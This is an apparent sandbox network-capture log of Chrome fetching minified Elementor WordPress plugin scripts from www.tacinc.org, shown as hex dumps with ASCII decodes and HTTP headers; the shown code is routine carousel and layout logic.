                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 65 72 73 65 28 29 2e 66 6f 72 45 61 63 68 28 65 3d 3e 7b 76 61 72 20 74 3d 6f 5b 65 5d 7c 7c 61 3b 72 2e 62 72 65 61 6b 70 6f 69 6e 74 73 5b 73 5b 65 5d 2e 76 61 6c 75 65 5d 3d 7b 73 6c 69 64 65 73 50 65 72 56 69 65 77 3a 2b 6e 5b 74 68 69 73 2e 67 65 74 53 6b 69 6e 50 72 65 66 69 78 28 29 2b 22 73 6c 69 64 65 73 5f 74 6f 5f 73 68 6f 77 5f 22 2b 65 5d 7c 7c 74 2c 73 6c 69 64 65 73 50 65 72 47 72 6f 75 70 3a 2b 6e 5b 74 68 69 73 2e 67 65 74 53 6b 69 6e 50 72 65 66 69 78 28 29 2b 22 73 6c 69 64 65 73 5f 74 6f 5f 73 63 72 6f 6c 6c 5f 22 2b 65 5d 7c 7c 31 7d 2c 61 3d 2b 6e 5b 74 68 69 73 2e 67 65 74 53 6b 69 6e 50 72 65 66 69 78 28 29 2b 22 73 6c 69 64 65 73 5f 74 6f 5f 73 68 6f 77 5f 22 2b 65 5d 7c 7c 74 7d 29 2c 22 79 65 73 22 3d 3d 3d 6e 5b 74 68 69 73 2e
                                                                                                                                                                                                                              Data Ascii: erse().forEach(e=>{var t=o[e]||a;r.breakpoints[s[e].value]={slidesPerView:+n[this.getSkinPrefix()+"slides_to_show_"+e]||t,slidesPerGroup:+n[this.getSkinPrefix()+"slides_to_scroll_"+e]||1},a=+n[this.getSkinPrefix()+"slides_to_show_"+e]||t}),"yes"===n[this.
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 68 61 6e 64 6c 65 45 6c 65 6d 65 6e 74 6f 72 42 72 65 61 6b 70 6f 69 6e 74 73 3a 21 30 2c 62 72 65 61 6b 70 6f 69 6e 74 73 3a 7b 7d 7d 3b 6e 2e 62 72 65 61 6b 70 6f 69 6e 74 73 5b 6f 2e 6d 6f 62 69 6c 65 2e 76 61 6c 75 65 5d 3d 7b 73 6c 69 64 65 73 50 65 72 56 69 65 77 3a 2b 74 5b 74 68 69 73 2e 67 65 74 53 6b 69 6e 50 72 65 66 69 78 28 29 2b 22 73 6c 69 64 65 73 5f 74 6f 5f 73 68 6f 77 5f 6d 6f 62 69 6c 65 22 5d 7c 7c 31 2c 73 6c 69 64 65 73 50 65 72 47 72 6f 75 70 3a 2b 74 5b 74 68 69 73 2e 67 65 74 53 6b 69 6e 50 72 65 66 69 78 28 29 2b 22 73 6c 69 64 65 73 5f 74 6f 5f 73 63 72 6f 6c 6c 5f 6d 6f 62 69 6c 65 22 5d 7c 7c 31 7d 2c 6e 2e 62 72 65 61 6b 70 6f 69 6e 74 73 5b 6f 2e 74 61 62 6c 65 74 2e 76 61 6c 75 65 5d 3d 7b 73 6c 69 64 65 73 50 65 72 56 69
                                                                                                                                                                                                                              Data Ascii: handleElementorBreakpoints:!0,breakpoints:{}};n.breakpoints[o.mobile.value]={slidesPerView:+t[this.getSkinPrefix()+"slides_to_show_mobile"]||1,slidesPerGroup:+t[this.getSkinPrefix()+"slides_to_scroll_mobile"]||1},n.breakpoints[o.tablet.value]={slidesPerVi
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 69 6f 6e 20 65 28 29 7b 72 65 74 75 72 6e 21 21 74 68 69 73 2e 67 65 74 45 6c 65 6d 65 6e 74 53 65 74 74 69 6e 67 73 28 74 68 69 73 2e 67 65 74 53 6b 69 6e 50 72 65 66 69 78 28 29 2b 22 70 6f 73 74 5f 73 6c 69 64 65 72 22 29 7d 2c 74 6f 67 67 6c 65 50 61 75 73 65 4f 6e 48 6f 76 65 72 3a 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 74 3f 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 63 61 72 6f 75 73 65 6c 2e 6f 6e 28 7b 6d 6f 75 73 65 65 6e 74 65 72 3a 28 29 3d 3e 7b 7d 2c 6d 6f 75 73 65 6c 65 61 76 65 3a 28 29 3d 3e 7b 7d 7d 29 3a 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 63 61 72 6f 75 73 65 6c 2e 6f 66 66 28 22 6d 6f 75 73 65 65 6e 74 65 72 20 6d 6f 75 73 65 6c 65 61 76 65 22 29 7d 2c 72 75 6e 3a 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 69 66 28 74 68 69
                                                                                                                                                                                                                              Data Ascii: ion e(){return!!this.getElementSettings(this.getSkinPrefix()+"post_slider")},togglePauseOnHover:function e(t){t?this.elements.$carousel.on({mouseenter:()=>{},mouseleave:()=>{}}):this.elements.$carousel.off("mouseenter mouseleave")},run:function e(){if(thi
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 6f 6b 73 2e 61 64 64 41 63 74 69 6f 6e 28 22 66 72 6f 6e 74 65 6e 64 2f 65 6c 65 6d 65 6e 74 5f 72 65 61 64 79 2f 70 6f 73 74 73 2e 63 75 73 74 6f 6d 22 2c 65 29 3b 76 61 72 20 65 3d 65 3d 3e 7b 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 65 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 2e 61 64 64 48 61 6e 64 6c 65 72 28 45 6c 65 43 75 73 74 6f 6d 53 6b 69 6e 53 6c 69 64 65 72 41 72 63 68 69 76 65 2c 7b 24 65 6c 65 6d 65 6e 74 3a 65 7d 29 7d 3b 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 68 6f 6f 6b 73 2e 61 64 64 41 63 74 69 6f 6e 28 22 66 72 6f 6e 74 65 6e 64 2f 65 6c 65 6d 65 6e 74 5f 72 65 61 64 79 2f 61 72 63 68 69 76 65 2d 70 6f 73 74 73 2e 61 72 63 68 69 76 65 5f 63 75 73 74 6f 6d 22 2c 65 29 7d 29 3b 76 61 72 20 45 6c 65 43 75 73
                                                                                                                                                                                                                              Data Ascii: oks.addAction("frontend/element_ready/posts.custom",e);var e=e=>{elementorFrontend.elementsHandler.addHandler(EleCustomSkinSliderArchive,{$element:e})};elementorFrontend.hooks.addAction("frontend/element_ready/archive-posts.archive_custom",e)});var EleCus
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 20 65 28 29 7b 76 61 72 20 6e 3d 6a 51 75 65 72 79 2c 69 3d 74 68 69 73 2c 74 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 5b 30 5d 2c 22 3a 61 66 74 65 72 22 29 2e 63 6f 6e 74 65 6e 74 2c 73 3d 74 68 69 73 2e 67 65 74 53 65 74 74 69 6e 67 73 28 29 3b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 70 6f 73 74 73 43 6f 6e 74 61 69 6e 65 72 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 73 2e 63 6c 61 73 73 65 73 2e 68 61 73 49 74 65 6d 52 61 74 69 6f 2c 21 21 74 2e 6d 61 74 63 68 28 2f 5c 64 2f 29 29 2c 69 2e 69 73 4d 61 73 6f 6e 72 79 45 6e 61 62 6c 65 64 28 29 7c 7c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 70 6f 73 74 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6e 28 74 68 69 73 29 2c
                                                                                                                                                                                                                              Data Ascii: e(){var n=jQuery,i=this,t=getComputedStyle(this.$element[0],":after").content,s=this.getSettings();this.elements.$postsContainer.toggleClass(s.classes.hasItemRatio,!!t.match(/\d/)),i.isMasonryEnabled()||this.elements.$posts.each(function(){var e=n(this),
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 6e 67 73 28 22 63 6f 6c 73 43 6f 75 6e 74 22 29 2c 76 65 72 74 69 63 61 6c 53 70 61 63 65 42 65 74 77 65 65 6e 3a 73 7d 29 2e 72 75 6e 28 29 2c 45 43 53 5f 43 6f 6c 75 6d 6e 73 5f 43 6f 75 6e 74 3d 74 68 69 73 2e 67 65 74 53 65 74 74 69 6e 67 73 28 22 63 6f 6c 73 43 6f 75 6e 74 22 29 2c 45 43 53 5f 61 64 64 5f 61 63 74 69 6f 6e 28 22 61 6a 61 78 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 45 43 53 5f 72 65 73 65 74 5f 6d 61 73 6f 6e 72 79 28 74 2e 24 70 6f 73 74 73 43 6f 6e 74 61 69 6e 65 72 29 2c 6d 79 6d 61 73 6f 6e 72 79 3d 6e 65 77 20 65 6c 65 6d 65 6e 74 6f 72 4d 6f 64 75 6c 65 73 2e 75 74 69 6c 73 2e 4d 61 73 6f 6e 72 79 28 7b 63 6f 6e 74 61 69 6e 65 72 3a 74 2e 24 70 6f 73 74 73 43 6f 6e 74 61 69 6e 65 72 2c 69 74 65 6d 73 3a 74 2e 24 70 6f 73 74 73 43
                                                                                                                                                                                                                              Data Ascii: ngs("colsCount"),verticalSpaceBetween:s}).run(),ECS_Columns_Count=this.getSettings("colsCount"),ECS_add_action("ajax",function(){ECS_reset_masonry(t.$postsContainer),mymasonry=new elementorModules.utils.Masonry({container:t.$postsContainer,items:t.$postsC
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1170INData Raw: 65 77 28 29 7b 6a 51 75 65 72 79 28 22 2e 65 63 73 2d 6c 61 7a 79 6c 6f 61 64 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 74 68 69 73 29 2e 69 6e 56 69 65 77 28 29 26 26 28 69 64 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 74 74 72 28 22 64 61 74 61 2d 74 61 72 67 65 74 69 64 22 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 61 6e 69 6d 61 74 69 6f 6e 2d 68 69 64 64 65 6e 22 29 2c 45 43 53 5f 6c 6f 61 64 5f 6e 65 78 74 5f 70 61 67 65 28 69 64 29 29 7d 29 7d 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 65 6c 65 6d 65 6e 74 6f 72 2f 66 72 6f 6e 74 65 6e 64 2f 69 6e 69 74 22 2c 28 29 3d 3e 7b 76 61 72 20 65 3d 65 3d 3e 7b 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e
                                                                                                                                                                                                                              Data Ascii: ew(){jQuery(".ecs-lazyload").each(function(){jQuery(this).inView()&&(id=jQuery(this).attr("data-targetid"),jQuery(this).removeClass("animation-hidden"),ECS_load_next_page(id))})}jQuery(window).on("elementor/frontend/init",()=>{var e=e=>{elementorFrontend.
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              117192.168.2.649853141.193.213.114431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC591OUTGET /wp-content/plugins/elementor/assets/js/frontend-modules.min.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _ga=GA1.2.2026524419.1729706650; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC493INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:11 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Tue, 15 Oct 2024 16:58:20 GMT
                                                                                                                                                                                                                              ETag: W/"670e9f2c-13b11"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614822
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5ec9f066b2d-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC876INData Raw: 37 64 63 33 0d 0a 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 20 2d 20 76 33 2e 32 34 2e 30 20 2d 20 30 39 2d 31 30 2d 32 30 32 34 20 2a 2f 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 65 6c 65 6d 65 6e 74 6f 72 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 65 6c 65 6d 65 6e 74 6f 72 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 35 34 5d 2c 7b 33 38 31 3a 28 65 2c 74 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 64 65 66 61 75 6c 74 3d 76 6f 69 64 20 30 3b 74 2e 64 65 66 61 75 6c 74 3d 28 65 2c 74 29 3d 3e 7b 74 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 3f 74 3a 5b 74 5d 3b 66 6f
                                                                                                                                                                                                                              Data Ascii: 7dc3/*! elementor - v3.24.0 - 09-10-2024 */(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[354],{381:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;t.default=(e,t)=>{t=Array.isArray(t)?t:[t];fo
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 65 6e 74 6f 72 2e 73 65 74 74 69 6e 67 73 2e 70 61 67 65 2e 6d 6f 64 65 6c 3b 6a 51 75 65 72 79 2e 65 61 63 68 28 65 2e 67 65 74 41 63 74 69 76 65 43 6f 6e 74 72 6f 6c 73 28 29 2c 28 6e 3d 3e 7b 74 5b 6e 5d 3d 65 2e 61 74 74 72 69 62 75 74 65 73 5b 6e 5d 7d 29 29 7d 65 6c 73 65 20 74 3d 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 64 61 74 61 28 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 74 74 69 6e 67 73 22 29 7c 7c 7b 7d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 49 74 65 6d 73 28 74 2c 65 29 7d 72 75 6e 45 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 73 28 29 7b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 65 6c 65 6d 65 6e 74 73 2e 65 61 63 68 28 28 28 65 2c 74 29 3d 3e 73 65 74 54 69 6d 65 6f 75 74 28 28 28 29 3d 3e 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e
                                                                                                                                                                                                                              Data Ascii: entor.settings.page.model;jQuery.each(e.getActiveControls(),(n=>{t[n]=e.attributes[n]}))}else t=this.$element.data("elementor-settings")||{};return this.getItems(t,e)}runElementsHandlers(){this.elements.$elements.each(((e,t)=>setTimeout((()=>elementorFron
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 64 67 65 74 4e 75 6d 62 65 72 28 29 7d 22 5d 60 7d 2c 61 72 69 61 41 74 74 72 69 62 75 74 65 73 3a 7b 74 69 74 6c 65 53 74 61 74 65 41 74 74 72 69 62 75 74 65 3a 22 61 72 69 61 2d 73 65 6c 65 63 74 65 64 22 2c 61 63 74 69 76 65 54 69 74 6c 65 53 65 6c 65 63 74 6f 72 3a 27 5b 61 72 69 61 2d 73 65 6c 65 63 74 65 64 3d 22 74 72 75 65 22 5d 27 7d 2c 64 61 74 61 73 65 74 73 3a 7b 74 69 74 6c 65 49 6e 64 65 78 3a 22 64 61 74 61 2d 74 61 62 2d 69 6e 64 65 78 22 7d 2c 6b 65 79 44 69 72 65 63 74 69 6f 6e 3a 7b 41 72 72 6f 77 4c 65 66 74 3a 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 43 6f 6e 66 69 67 2e 69 73 5f 72 74 6c 3f 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 4e 65 78 74 3a 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 50 72 65 76 69 6f 75 73 2c 41 72 72
                                                                                                                                                                                                                              Data Ascii: dgetNumber()}"]`},ariaAttributes:{titleStateAttribute:"aria-selected",activeTitleSelector:'[aria-selected="true"]'},datasets:{titleIndex:"data-tab-index"},keyDirection:{ArrowLeft:elementorFrontendConfig.is_rtl?this.directionNext:this.directionPrevious,Arr
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 65 6e 74 73 2e 24 69 74 65 6d 54 69 74 6c 65 73 2e 6f 66 66 28 74 68 69 73 2e 67 65 74 54 69 74 6c 65 45 76 65 6e 74 73 28 29 29 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 66 6f 63 75 73 61 62 6c 65 43 6f 6e 74 61 69 6e 65 72 45 6c 65 6d 65 6e 74 73 2e 63 68 69 6c 64 72 65 6e 28 29 2e 6f 66 66 28 74 68 69 73 2e 67 65 74 43 6f 6e 74 65 6e 74 45 6c 65 6d 65 6e 74 45 76 65 6e 74 73 28 29 29 7d 67 65 74 54 69 74 6c 65 45 76 65 6e 74 73 28 29 7b 72 65 74 75 72 6e 7b 6b 65 79 64 6f 77 6e 3a 74 68 69 73 2e 68 61 6e 64 6c 65 54 69 74 6c 65 4b 65 79 62 6f 61 72 64 4e 61 76 69 67 61 74 69 6f 6e 2e 62 69 6e 64 28 74 68 69 73 29 7d 7d 67 65 74 43 6f 6e 74 65 6e 74 45 6c 65 6d 65 6e 74 45 76 65 6e 74 73 28 29 7b 72 65 74 75 72 6e 7b 6b 65 79 64 6f 77 6e 3a 74 68
                                                                                                                                                                                                                              Data Ascii: ents.$itemTitles.off(this.getTitleEvents()),this.elements.$focusableContainerElements.children().off(this.getContentElementEvents())}getTitleEvents(){return{keydown:this.handleTitleKeyboardNavigation.bind(this)}}getContentElementEvents(){return{keydown:th
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 56 61 6c 75 65 28 65 29 3b 69 3d 6e 3c 74 2b 73 3f 31 3a 30 3d 3d 3d 74 2b 73 3f 6e 3a 74 2b 73 7d 72 65 74 75 72 6e 20 69 7d 63 68 61 6e 67 65 54 69 74 6c 65 46 6f 63 75 73 28 65 29 7b 63 6f 6e 73 74 20 74 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 69 74 65 6d 54 69 74 6c 65 73 2e 66 69 6c 74 65 72 28 74 68 69 73 2e 67 65 74 54 69 74 6c 65 46 69 6c 74 65 72 53 65 6c 65 63 74 6f 72 28 65 29 29 3b 74 68 69 73 2e 73 65 74 54 69 74 6c 65 54 61 62 69 6e 64 65 78 28 65 29 2c 74 2e 74 72 69 67 67 65 72 28 22 66 6f 63 75 73 22 29 7d 73 65 74 54 69 74 6c 65 54 61 62 69 6e 64 65 78 28 65 29 7b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 69 74 65 6d 54 69 74 6c 65 73 2e 61 74 74 72 28 22 74 61 62 69 6e 64 65 78 22 2c 22 2d 31 22 29 3b 74 68 69 73 2e 65 6c 65
                                                                                                                                                                                                                              Data Ascii: Value(e);i=n<t+s?1:0===t+s?n:t+s}return i}changeTitleFocus(e){const t=this.elements.$itemTitles.filter(this.getTitleFilterSelector(e));this.setTitleTabindex(e),t.trigger("focus")}setTitleTabindex(e){this.elements.$itemTitles.attr("tabindex","-1");this.ele
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 69 70 65 72 57 72 61 70 70 65 72 29 2c 24 73 77 69 70 65 72 41 72 72 6f 77 73 3a 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 65 2e 73 77 69 70 65 72 41 72 72 6f 77 29 2c 24 70 61 67 69 6e 61 74 69 6f 6e 57 72 61 70 70 65 72 3a 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 65 2e 70 61 67 69 6e 61 74 69 6f 6e 57 72 61 70 70 65 72 29 2c 24 70 61 67 69 6e 61 74 69 6f 6e 42 75 6c 6c 65 74 73 3a 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 65 2e 70 61 67 69 6e 61 74 69 6f 6e 42 75 6c 6c 65 74 29 2c 24 70 61 67 69 6e 61 74 69 6f 6e 42 75 6c 6c 65 74 57 72 61 70 70 65 72 3a 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 65 2e 70 61 67 69 6e 61 74 69 6f 6e 42 75 6c 6c 65 74 57 72 61 70 70 65 72 29 7d 3b 72 65 74 75 72
                                                                                                                                                                                                                              Data Ascii: iperWrapper),$swiperArrows:this.$element.find(e.swiperArrow),$paginationWrapper:this.$element.find(e.paginationWrapper),$paginationBullets:this.$element.find(e.paginationBullet),$paginationBulletWrapper:this.$element.find(e.paginationBulletWrapper)};retur
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 2d 62 75 74 74 6f 6e 2d 6e 65 78 74 22 7d 29 2c 6c 26 26 28 72 2e 70 61 67 69 6e 61 74 69 6f 6e 3d 7b 65 6c 3a 60 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 24 7b 74 68 69 73 2e 67 65 74 49 44 28 29 7d 20 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 60 2c 74 79 70 65 3a 65 2e 70 61 67 69 6e 61 74 69 6f 6e 3f 65 2e 70 61 67 69 6e 61 74 69 6f 6e 3a 22 62 75 6c 6c 65 74 73 22 2c 63 6c 69 63 6b 61 62 6c 65 3a 21 30 2c 72 65 6e 64 65 72 42 75 6c 6c 65 74 3a 28 65 2c 74 29 3d 3e 60 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 24 7b 74 7d 22 20 64 61 74 61 2d 62 75 6c 6c 65 74 2d 69 6e 64 65 78 3d 22 24 7b 65 7d 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 24 7b 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 63 6f 6e 66 69 67 2e 69 31 38 6e
                                                                                                                                                                                                                              Data Ascii: -button-next"}),l&&(r.pagination={el:`.elementor-element-${this.getID()} .swiper-pagination`,type:e.pagination?e.pagination:"bullets",clickable:!0,renderBullet:(e,t)=>`<span class="${t}" data-bullet-index="${e}" aria-label="${elementorFrontend.config.i18n
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 72 63 65 53 6c 69 64 65 72 54 6f 53 68 6f 77 4e 65 78 74 53 6c 69 64 65 57 68 65 6e 4f 6e 4c 61 73 74 28 74 2c 6e 29 2c 74 68 69 73 2e 61 64 64 43 6c 61 73 73 54 6f 53 77 69 70 65 72 43 6f 6e 74 61 69 6e 65 72 28 22 6f 66 66 73 65 74 2d 72 69 67 68 74 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 6c 65 66 74 22 3a 74 68 69 73 2e 61 64 64 43 6c 61 73 73 54 6f 53 77 69 70 65 72 43 6f 6e 74 61 69 6e 65 72 28 22 6f 66 66 73 65 74 2d 6c 65 66 74 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 62 6f 74 68 22 3a 74 68 69 73 2e 66 6f 72 63 65 53 6c 69 64 65 72 54 6f 53 68 6f 77 4e 65 78 74 53 6c 69 64 65 57 68 65 6e 4f 6e 4c 61 73 74 28 74 2c 6e 29 2c 74 68 69 73 2e 61 64 64 43 6c 61 73 73 54 6f 53 77 69 70 65 72 43 6f 6e 74 61 69 6e 65 72 28 22 6f 66 66 73 65 74 2d 62 6f
                                                                                                                                                                                                                              Data Ascii: rceSliderToShowNextSlideWhenOnLast(t,n),this.addClassToSwiperContainer("offset-right");break;case"left":this.addClassToSwiperContainer("offset-left");break;case"both":this.forceSliderToShowNextSlideWhenOnLast(t,n),this.addClassToSwiperContainer("offset-bo
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 70 61 67 69 6e 61 74 69 6f 6e 57 72 61 70 70 65 72 2e 6f 66 66 28 29 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 73 77 69 70 65 72 43 6f 6e 74 61 69 6e 65 72 2e 6f 66 66 28 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 22 3a 66 6f 63 75 73 61 62 6c 65 22 29 2e 6f 66 66 28 29 2c 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 65 6c 65 6d 65 6e 74 73 2e 24 77 69 6e 64 6f 77 2e 6f 66 66 28 22 72 65 73 69 7a 65 22 29 7d 6f 6e 44 69 72 65 63 74 69 6f 6e 41 72 72 6f 77 4b 65 79 64 6f 77 6e 28 65 29 7b 63 6f 6e 73 74 20 74 3d 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 63 6f 6e 66 69 67 2e 69 73 5f 72 74 6c 2c 6e 3d 65 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 2e 63 6f 64 65 2c 69 3d 74 3f
                                                                                                                                                                                                                              Data Ascii: s.elements.$paginationWrapper.off(),this.elements.$swiperContainer.off(),this.$element.find(":focusable").off(),elementorFrontend.elements.$window.off("resize")}onDirectionArrowKeydown(e){const t=elementorFrontend.config.is_rtl,n=e.originalEvent.code,i=t?
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 70 61 63 69 6e 67 5f 63 75 73 74 6f 6d 22 2c 22 73 69 7a 65 22 2c 65 29 7c 7c 30 7d 75 70 64 61 74 65 53 70 61 63 65 42 65 74 77 65 65 6e 28 65 29 7b 63 6f 6e 73 74 20 74 3d 65 2e 6d 61 74 63 68 28 22 69 6d 61 67 65 5f 73 70 61 63 69 6e 67 5f 63 75 73 74 6f 6d 5f 28 2e 2a 29 22 29 2c 6e 3d 74 3f 74 5b 31 5d 3a 22 64 65 73 6b 74 6f 70 22 2c 69 3d 74 68 69 73 2e 67 65 74 53 70 61 63 65 42 65 74 77 65 65 6e 28 6e 29 3b 22 64 65 73 6b 74 6f 70 22 21 3d 3d 6e 26 26 28 74 68 69 73 2e 73 77 69 70 65 72 2e 70 61 72 61 6d 73 2e 62 72 65 61 6b 70 6f 69 6e 74 73 5b 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 63 6f 6e 66 69 67 2e 72 65 73 70 6f 6e 73 69 76 65 2e 61 63 74 69 76 65 42 72 65 61 6b 70 6f 69 6e 74 73 5b 6e 5d 2e 76 61 6c 75 65 5d 2e 73 70 61 63
                                                                                                                                                                                                                              Data Ascii: pacing_custom","size",e)||0}updateSpaceBetween(e){const t=e.match("image_spacing_custom_(.*)"),n=t?t[1]:"desktop",i=this.getSpaceBetween(n);"desktop"!==n&&(this.swiper.params.breakpoints[elementorFrontend.config.responsive.activeBreakpoints[n].value].spac


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              118192.168.2.649854141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC773OUTGET /wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
